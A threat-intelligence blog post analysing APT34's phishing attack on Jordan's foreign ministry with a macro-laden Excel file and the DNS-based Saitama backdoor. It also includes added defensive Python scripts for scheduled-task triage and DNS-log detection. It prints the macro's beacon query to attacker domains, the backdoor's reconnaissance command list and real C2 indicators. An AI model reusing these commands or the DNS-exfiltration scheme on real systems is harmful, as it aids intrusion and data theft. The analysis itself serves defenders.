Effective URL: https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/?mkt_tok=...
Threat Intelligence


APT34 TARGETS JORDAN GOVERNMENT USING NEW SAITAMA BACKDOOR

Posted: May 10, 2022 by Threat Intelligence Team
Last updated: May 13, 2022

A deep dive into a sophisticated attack that used the Saitama backdoor.

On April 26th, we identified a suspicious email that targeted a government
official from Jordan’s foreign ministry. The email contained a malicious Excel
document that drops a new backdoor named Saitama. Following our investigation,
we were able to attribute this attack to the known Iranian actor APT34.

Also known as OilRig/COBALT GYPSY/IRN2/HELIX KITTEN, APT34 is an Iranian threat
group that has targeted Middle Eastern countries and victims worldwide since at
least 2014. The group is known to focus on the financial, governmental, energy,
chemical, and telecommunication sectors.

In this blog post, we describe the attack flow and share details about the
Saitama backdoor.


MALICIOUS EMAIL FILE

The malicious email was sent to the victim from a Microsoft Outlook account,
with the subject “Confirmation Receive Document” and an attached Excel file
called “Confirmation Receive Document.xls”. The sender pretends to be from the
Government of Jordan by using its coat of arms as a signature.

Figure 1: Malicious email


EXCEL DOCUMENT

The Excel attachment contains a malicious macro. The document displays an
image that tries to convince the victim to enable macros.

Figure 2: Excel doc

After the macro is enabled, the image is replaced with the Jordan government’s
coat of arms:

Figure 3: Excel doc after enabling the macro

The macro is executed on Workbook_Open(). Its main functionalities are:

Figure 4: Macro
 * Hides the current sheet and shows a new sheet that contains the coat of
   arms image.
 * Calls the “eNotif” function, which sends a notification of each step of the
   macro’s execution to its server over DNS. To send a notification, it builds
   a server domain for that step from the following parts: “qw” + identifier
   of the step (in this step “zbabz”) + random number + domain name
   (joexpediagroup.com), e.g. qwzbabz7055.joexpediagroup.com. It then runs the
   following WMI query to resolve that name, which performs the DNS request to
   the created subdomain:
   Select * From Win32_PingStatus Where Address = '" & p_sHostName & "'
 * Creates a TaskService object and gets the task folder that contains the
   list of current tasks.
 * Calls the eNotif function.
 * Checks whether a mouse is connected to the PC and, if so, performs the
   following steps:
   * Creates the %APPDATA%/MicrosoftUpdate directory
   * Creates “Update.exe”, “Update.exe.config” and
     “Microsoft.Exchange.WenServices.dll”
   * Reads the contents of UserForm1.label1, UserForm2.label1 and
     UserForm3.label1, which are Base64 encoded, decodes them and writes them
     into the files created in the previous step
   * Calls the eNotif function after each write
 * Checks for the existence of the Update.exe file and, if for some reason it
   has not been written to disk, writes it using a technique that loads a .NET
   assembly directly through mscorlib and Assembly.Load by manually accessing
   the VTable of IUnknown. This technique was taken from GitHub (link). Even
   though the technique was not used in this macro, since the file was already
   written, the function name (“Test”) suggests that the threat actor is trying
   to implement it in future attacks.
 * Finally, it calls the eNotif function.

Figure 5: Load .Net assembly
 * Defines an XML schema for a scheduled task and registers it using the
   RegisterTask function. The scheduled task is named MicrosoftUpdate and is
   used to make Update.exe persistent.

Figure 6: Task Schema
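The persistence described above leaves a task definition on disk that a responder can triage without running anything. The following is an added example, not code from the report or from Malwarebytes: it parses an exported Task Scheduler XML definition and flags the traits the report attributes to this task (a name mimicking Windows Update, an action launched from %APPDATA%\MicrosoftUpdate, a short repetition interval). The sample XML is constructed to match the report's description and is not the actor's actual schema; the 5-minute interval is a placeholder, since the report only says "every X minutes". The Task Scheduler namespace URI and the on-disk location %SystemRoot%\System32\Tasks are real; the 15-minute threshold is an arbitrary tuning choice.

```python
"""Triage an exported Windows scheduled task definition for the persistence
pattern described above (task "MicrosoftUpdate" launching Update.exe from
%APPDATA%\\MicrosoftUpdate on a repeating trigger)."""
import re
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler XML definitions (real schema URI).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample modelled on the report's description; NOT the actor's
# actual task XML. The 5-minute interval is a placeholder ("every X minutes").
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\MicrosoftUpdate</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT5M</Interval></Repetition>
      <StartBoundary>2022-04-26T10:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>%APPDATA%\\MicrosoftUpdate\\Update.exe</Command></Exec>
  </Actions>
</Task>"""

# Action locations a genuine Windows Update task never runs from.
USER_WRITABLE_HINTS = ("%appdata%", "\\appdata\\", "%temp%", "\\temp\\", "%localappdata%")


def iso_duration_seconds(text):
    """Convert a Task Scheduler ISO 8601 duration such as PT5M or P1DT2H to seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", (text or "").strip())
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def triage_task(xml_text, max_benign_interval=15 * 60):
    """Return the task name, its Exec commands, the shortest repetition interval
    and a list of findings describing why the task looks like this persistence."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=TASK_NS)
    name = uri.strip().lstrip("\\").split("\\")[-1]
    commands = [(c.text or "").strip()
                for c in root.findall(".//t:Actions/t:Exec/t:Command", TASK_NS)]
    intervals = [iso_duration_seconds(i.text)
                 for i in root.findall(".//t:Triggers//t:Repetition/t:Interval", TASK_NS)]
    intervals = [i for i in intervals if i is not None]
    interval = min(intervals) if intervals else None

    findings = []
    for cmd in commands:
        low = cmd.lower()
        if any(h in low for h in USER_WRITABLE_HINTS):
            findings.append(f"action runs from a user-writable profile path: {cmd}")
        if low.endswith("update.exe") and name.lower() == "microsoftupdate":
            findings.append("task name and binary mimic Windows Update (matches the report's indicator)")
    if interval is not None and interval <= max_benign_interval:
        findings.append(f"repeats every {interval}s: beacon-style repetition interval")
    return {"name": name, "commands": commands, "interval_seconds": interval, "findings": findings}


def triage_task_file(path):
    """Triage a task file from %SystemRoot%\\System32\\Tasks (stored as UTF-16 XML).
    Bytes are passed through so the file's own XML encoding declaration is honoured."""
    with open(path, "rb") as fh:
        return triage_task(fh.read())


if __name__ == "__main__":
    result = triage_task(SAMPLE_TASK_XML)
    print(result["name"], result["interval_seconds"])
    for finding in result["findings"]:
        print(" -", finding)
```

Running it over every file under %SystemRoot%\System32\Tasks turns the report's single indicator into a reusable check: a task that repeats every few minutes and executes from a user-writable profile directory deserves a look regardless of what it is named.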


SAITAMA BACKDOOR – A FINITE STATE MACHINE

The dropped payload is a small backdoor written in .NET. It has the following
interesting PDB path:
E:\Saitama\Saitama.Agent\obj\Release\Saitama.Agent.pdb.

The Saitama backdoor abuses the DNS protocol for its command and control
communications, which is stealthier than other communication methods such as
HTTP. The actor also cleverly uses techniques such as compression and long
random sleep times to hide malicious traffic among legitimate traffic.

Figure 7: DNS communications

Another element we found interesting about this backdoor is the way it is
implemented. The whole flow of the program is defined explicitly as a
finite-state machine, as shown in Figure 7. In short, the machine changes its
state depending on the command sent to each state. Graphically, the program
flow can be seen as follows:

Figure 8: Graphical view of the state machine

The states of the finite-state machine are:


BEGIN

This is the initial state of the machine. It only accepts the start command,
which puts the machine into the ALIVE state.


ALIVE

This state contacts the C&C server, expecting to receive a command from the
attackers. The server names are generated by a PRNG algorithm that involves
transformations like the Mersenne Twister; these transformations generate
subdomains of the domains hardcoded in the Config class (Figure 8).

Figure 9: Main domains are hardcoded

Figure 9 shows an example of the generated subdomain:

Figure 10: Connection attempt to a C&C server

This state has two possible next states. If the DNS request fails, the next
state is SLEEP; otherwise, the next state is RECEIVE.


SLEEP AND SECOND SLEEP

These states put the backdoor into sleep mode. The amount of time the program
sleeps is determined by the previous state. It is clear that one of the actor's
main motivations is to be as stealthy as possible: for example, an unsuccessful
DNS request puts the backdoor to sleep for between 6 and 8 hours! There are
different sleep times for different situations (values are expressed in
milliseconds):

Figure 11: A different sleep time for every situation

There is also a “Second Sleep” state that puts the program to sleep for a
different amount of time.


RECEIVE

This state receives commands from the C&C servers. Commands are sent in the IP
address field returned by the DNS responses. Further details about the
communication protocol are provided later in this report. In a nutshell, every
DNS request can receive 4 bytes. The backdoor concatenates the responses to
build buffers, and these buffers contain the commands that the backdoor will
execute.


DO (DOTASK)

This state executes commands received from the server. The backdoor can execute
pre-established commands, custom commands, or drop files. The communication
also supports compression. The following table lists the predefined commands
that the backdoor can execute.

ID  Type  Command
 1  PS    Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress
 2  PS    Get-NetNeighbor -AddressFamily IPv4 | Select-Object "IPADDress"
 3  CMD   whoami
 4  PS    [System.Environment]::OSVersion.VersionString
 5  CMD   net user
 6  --    [NOT USED]
 7  PS    Get-ChildItem -Path "C:\Program Files" | Select-Object Name
 8  PS    Get-ChildItem -Path 'C:\Program Files (x86)' | Select-Object Name
 9  PS    Get-ChildItem -Path 'C:' | Select-Object Name
10  CMD   hostname
11  PS    Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} |
          Select-Object "LocalAddress", "LocalPort", "RemoteAddress", "RemotePort"
12  PS    $(ping -n 1 10.65.4.50 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.4.51 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.65.65 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.53.53 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.21.200 | findstr /i ttl) -eq $null
13  PS    nslookup ise-posture.mofagov.gover.local | findstr /i Address;
          nslookup webmail.gov.jo | findstr /i Address
14  PS    $(ping -n 1 10.10.21.201 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.19.201 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.19.202 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.24.200 | findstr /i ttl) -eq $null
15  PS    $(ping -n 1 10.10.10.4 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.50.10 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.22.50 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.45.19 | findstr /i ttl) -eq $null
16  PS    $(ping -n 1 10.65.51.11 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.6.1 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.52.200 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.6.3 | findstr /i ttl) -eq $null
17  PS    $(ping -n 1 10.65.45.18 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.28.41 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.36.13 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.51.10 | findstr /i ttl) -eq $null
18  PS    $(ping -n 1 10.10.22.42 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.23.200 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.45.19 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.10.19.50 | findstr /i ttl) -eq $null
19  PS    $(ping -n 1 10.65.45.3 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.4.52 | findstr /i ttl) -eq $null;
          $(ping -n 1 10.65.31.155 | findstr /i ttl) -eq $null;
          $(ping -n 1 ise-posture.mofagov.gover.local | findstr /i ttl) -eq $null
20  PS    Get-NetIPConfiguration | Foreach IPv4DefaultGateway | Select-Object NextHop
21  PS    Get-DnsClientServerAddress -AddressFamily IPv4 | Select-Object SERVERAddresses
22  CMD   systeminfo | findstr /i \"Domain\"

Figure 12: List of predefined commands

It is pretty shocking to see that even though the attackers can send any
command, they chose to embed this predefined list in the backdoor in Base64
format. As we can see, some of the commands are common reconnaissance snippets,
but others are not that common. In fact, some of them contain internal IPs and
internal domain names (like ise-posture.mofagov.gover.local). This shows that
the malware was clearly targeted and also indicates that the actor had prior
knowledge of the victim's internal infrastructure.


SEND – SEND AND RECEIVE

The Send state sends the results generated by commands to the actor’s server.
In this case, the subdomain name carries the data. As domain names are used to
exfiltrate unknown amounts of data, the attackers had to split the data into
different buffers, each of which is sent in a separate DNS request. As can be
seen in Figure 12, all the information required to reconstruct the original
data is sent to the attackers. The size of the buffer is only sent in the first
packet.

Figure 13: Send data to server
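Both DNS behaviours described on this page leave a footprint in resolver logs: the maldoc's per-step eNotif beacons (qw + step id + random number under joexpediagroup.com) and the backdoor's channel, where commands arrive 4 bytes per A answer (RECEIVE) and results leave as Base32-encoded subdomains (SEND). The following is an added example, not code from the report or from Malwarebytes, that scores such logs. The log line format and the sample traffic are constructed for the example; the C2 domains come from the IOC section below. The "bytes sent" figure is only an estimate (5 bits per Base32 character, ignoring the framing the report mentions), and the base-domain split assumes two-label domains like those in the IOC list.

```python
"""Flag the two DNS behaviours described above in resolver logs: the maldoc's
per-step eNotif beacons (qw<step><random>.<domain>) and Saitama's C2 channel
(commands arriving 4 bytes per A answer, results leaving as Base32 subdomains)."""
import re
from collections import defaultdict

# C2 domains taken from the report's IOC section.
C2_DOMAINS = {"uber-asia.com", "asiaworldremit.com", "joexpediagroup.com"}

# Beacon naming scheme from the macro analysis: "qw" + step id + random number.
BEACON_RE = re.compile(r"^qw(?P<step>[a-z]+)(?P<rand>\d+)$")
# A label drawn only from the Base32 alphabet (how the SEND state encodes data).
BASE32_RE = re.compile(r"^[a-z2-7]+$", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Constructed log format (an assumption, not any real resolver's format):
#   <timestamp> <client> <qname> <rcode> <answer or ->
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")

# Constructed sample traffic: one infected host (10.0.0.5) and one clean host.
LOG_SAMPLE = """\
2022-05-10T09:12:01Z 10.0.0.5 qwzbabz7055.joexpediagroup.com NOERROR 93.184.216.34
2022-05-10T09:12:02Z 10.0.0.5 www.example.com NOERROR 93.184.216.34
2022-05-10T09:12:09Z 10.0.0.5 qwknzpd4410.joexpediagroup.com NOERROR 93.184.216.34
2022-05-10T09:40:11Z 10.0.0.5 mfzw2ylqnfxgkzlt.uber-asia.com NOERROR 10.20.30.40
2022-05-10T09:40:13Z 10.0.0.5 mzxw6ytboi5a.uber-asia.com NOERROR 10.20.30.41
2022-05-10T09:40:15Z 10.0.0.5 ob2wk3dfmnz3k.uber-asia.com NXDOMAIN -
2022-05-10T09:41:00Z 10.0.0.9 mail.example.org NOERROR 203.0.113.7
"""


def split_qname(qname):
    """Return (prefix labels, base domain). Assumes a two-label base such as
    uber-asia.com, which is enough for the IOC list above."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, qname, rcode, answer = m.groups()
    return {"ts": ts, "client": client, "qname": qname,
            "rcode": rcode, "answer": None if answer == "-" else answer}


def analyze(lines):
    """Classify queries to the C2 domains into macro beacons and backdoor channel
    traffic, and estimate bytes moved per (client, domain) channel."""
    beacons = []
    channels = defaultdict(lambda: {"queries": 0, "labels": set(),
                                    "bytes_received": 0, "bytes_sent_est": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        prefix, base = split_qname(rec["qname"])
        if base not in C2_DOMAINS:
            continue
        m = BEACON_RE.match(prefix)
        if m:
            beacons.append({"client": rec["client"], "domain": base,
                            "step": m.group("step"), "rand": m.group("rand")})
            continue
        ch = channels[(rec["client"], base)]
        ch["queries"] += 1
        ch["labels"].add(prefix)
        if rec["answer"] and IPV4_RE.match(rec["answer"]):
            ch["bytes_received"] += 4  # per the report: one A answer carries 4 bytes
        for label in prefix.split("."):
            if BASE32_RE.match(label):
                ch["bytes_sent_est"] += len(label) * 5 // 8  # 5 bits per Base32 char
    return {"beacons": beacons,
            "channels": {k: {**v, "labels": len(v["labels"])} for k, v in channels.items()}}


if __name__ == "__main__":
    result = analyze(LOG_SAMPLE.splitlines())
    for b in result["beacons"]:
        print(f"macro beacon from {b['client']}: step {b['step']} via {b['domain']}")
    for (client, domain), ch in result["channels"].items():
        print(f"C2 channel {client} -> {domain}: {ch['queries']} queries, "
              f"{ch['labels']} distinct labels, ~{ch['bytes_received']} B in, "
              f"~{ch['bytes_sent_est']} B out")
```

The beacon match identifies which macro step ran (useful when reconstructing how far the infection got on a host), while the per-channel counters make the direction of the traffic visible: many distinct labels with few answered queries means data was leaving, many answered queries means commands were coming in. Because every hit is keyed on the IOC domains, the same structure works unchanged once those domains are replaced or extended.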


ATTRIBUTION

There are several indicators that suggest this campaign was operated by APT34.

 * Maldoc similarity: The maldoc used in this campaign shares similarities
   with maldocs used in previous campaigns of this actor. More specifically,
   similar to what was mentioned in CheckPoint’s report, this maldoc registers
   a scheduled task that launches the executable every X minutes, and it uses
   the same anti-sandboxing technique (checking whether a mouse is connected to
   the PC). Finally, we see a similar pattern of beaconing back to the
   attacker's server to report the current stage of execution.
 * Victim similarity: The group is known to target the government of Jordan,
   and this is the case in this campaign.
 * Payload similarity: DNS is the most common method used by APT34 for its C&C
   communications. The group is also known to use uncommon encodings such as
   Base32 and Base36 in its previous campaigns. The Saitama backdoor uses a
   Base32 encoding for sending data to the servers that is similar to the one
   used by DNSpionage. Also, to build subdomains it uses a Base32 encoding
   similar to what was reported by Mandiant.
   

Malwarebytes customers are protected from this attack via our Anti-Exploit
layer.




IOCS

Maldoc:
Confirmation Receive Document.xls
26884f872f4fae13da21fa2a24c24e963ee1eb66da47e270246d6d9dc7204c2b
Saitama backdoor:
update.exe
e0872958b8d3824089e5e1cfab03d9d98d22b9bcb294463818d721380075a52d
C2s:
uber-asia.com
asiaworldremit.com
joexpediagroup.com

